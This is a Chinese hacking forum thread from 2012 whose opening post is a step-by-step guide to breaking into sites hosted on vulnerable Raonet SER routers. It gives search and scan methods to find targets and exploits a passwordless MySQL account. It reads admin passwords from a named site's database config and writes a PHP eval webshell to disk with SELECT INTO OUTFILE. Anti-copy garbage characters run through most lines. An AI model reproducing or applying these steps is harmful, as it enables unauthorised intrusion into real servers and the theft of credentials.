找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2804|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:7 C% i) m# @* W* f9 f1 ]0 M

6 f* C4 K! v  O/ L1 E% u) Y& j1:google搜索'Raonet Subscriber Ethernet Router'
8 T9 C; _  l% u( a. h% n& \" V) ?2 ^' [- e& e+ s3 S' ^, i5 s8 U7 g, k
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001( {# @% ~0 t1 D; `- S: [8 v
; L/ l5 [- l) ~7 |2 \5 R% g  E" D2 [4 b
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。. |* n9 X9 d4 i8 z$ Z& X; Y# H

6 P) f  G" D' C' R3 e2 I//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......% P2 j& g3 z8 R9 p4 l4 l8 C3 `% k

; D% I, t/ V& G# Z- s: Q
6 A- y& @+ P- Y) V9 j; \" j$ M7 T( S$ |+ a/ `7 i
入侵步骤:
2 }+ c" N( _* m2 {: ?) H) q: g8 y( [9 B7 y. O& L
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 r% M5 K* H* W" M- c7 R4 J0 n
5 }# ^6 O, z9 ~- B$ n* {) U2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc$ z  ?6 H& s* L  O
3:得到密码后连接,查看GUI管理密码:- R. D7 S# C# Z* q8 N6 K
use ser_500
, y! q/ b; p% _3 }) P1 G& Iselect id,passwd from user;" u3 T0 w6 e& N9 Q6 c$ }8 q
4:通过数据库写入webshell,执行命令:& @4 R( p( k. C, X/ A4 B
use mysql;- m# Q; o8 f* l" \' w
create table ok(cmd TEXT);, ^* z) B2 o9 t4 d+ V6 E
insert into ok values("<?php @eval($_POST[cmd])?>");5 R& A% R, V8 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";0 `9 v3 R9 E( F; C8 y) M9 ?
drop table ok;
9 E! k. P8 ~3 ]
! ]3 L# f# c1 E$ R8 ^0 c2 {! g( w5:连接后门shell.php : P) L3 J+ F% ]8 N4 t2 A$ g

8 U& F" o* }3 E6 B, R) q5 t) u( {6. 搞定!
4 {  u' V3 p& `$ D! v/ x. z5 W* l" M
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表